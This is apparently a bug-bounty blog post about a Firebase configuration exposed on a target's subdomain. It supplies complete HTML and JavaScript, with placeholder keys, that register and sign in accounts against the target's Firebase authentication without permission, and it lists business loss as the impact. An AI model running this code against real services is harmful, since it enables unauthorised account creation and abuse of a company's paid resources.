Firebase key leak and How to exploit firebase keys

Hello Hunters, I am going to share a vulnerability that I found very recently. I cannot disclose the website name so I will mention it as Target.com

What is firebase?How to use
The Firebase Realtime Database lets you build rich, collaborative applications by allowing secure access to the database directly from client-side code. Data is persisted locally, and even while offline, realtime events continue to fire, giving the end-user a responsive experience.

For more details click

I found a firebase data in subdomain [abc.target.com]

Now I tell you how to exploit firebase data. I wrote an Html or js code for the exploit

Step 1: Html code
<!DOCTYPE html>
<html>
<head>
<meta charset=”utf-8">
<meta http-equiv=”X-UA-Compatible” content=”IE=edge”>
<title>Form</title>
<link rel=”stylesheet” href=””>
<! — The core Firebase JS SDK is always required and must be listed first →
<script src=”https://www.gstatic.com/firebasejs/7.18.0/firebase-app.js"></script>
<script src=”https://www.gstatic.com/firebasejs/7.18.0/firebase-auth.js"></script>
<script src=”form.js”></script>
</head>
<body>
<h1>Form</h1>
<div id=”fornContainer”>
<div id=”header”>
</div>
<input type=”email” placeholder=”email” id=”email”>
<input type=”password” placeholder=”password” id=”password”>
<button onclick=”signUp()” id=”signUp”>Sign Up</button>
<button onclick=”signIn()” id=”signIn”>Sign In</button>
<button onclick=”signOut()” id=”signUp”>Sign Out</button>
</body>

Step 2: Js code
//company data
var firebaseConfig = {
apiKey: “your_domain_key”,
authDomain: “your_domain.firebaseapp.com”,
databaseURL: “https://your_domain.firebaseio.com",
projectId: “your_domain-stage”,
storageBucket: “your_domain.appspot.com”,
messagingSenderId: “123456789012”,
appId: “1:53234*****:web:23c8b288e919a*********”
};
// Initialize Firebase
firebase.initializeApp(firebaseConfig);
const auth = firebase.auth();
function signUp(){
var email = document.getElementById(“email”);
var password = document.getElementById(“password”);
const promise = auth.createUserWithEmailAndPassword(email.value, password.value);
promise.catch(e => alert(e.message));
alert(“Signed Up”);
}
function signIn(){
var email = document.getElementById(“email”);
var password = document.getElementById(“password”);
const promise = auth.signInWithEmailAndPassword(email.value, password.value);
promise.catch(e => alert(e.message));
}
function signOut(){
auth.signOut();
alert(“Signed Out”);
}
auth.onAuthStateChanged(function(user){
if(user){
var email = user.email;
alert(“Active User “ + email);
//Take user to a different or home page
//is signed in
}else{
alert(“No Active User”);
//no user is signed in
}
});

Step 3: Open Html file in browsers
Step 4: Run it if you successfully SignUp and SignOut that’s means you connect with your target firebase

Impact:-

1. You can use the company firebase API without Company permission
2. If the Company invest money for firebase means Business loss can occur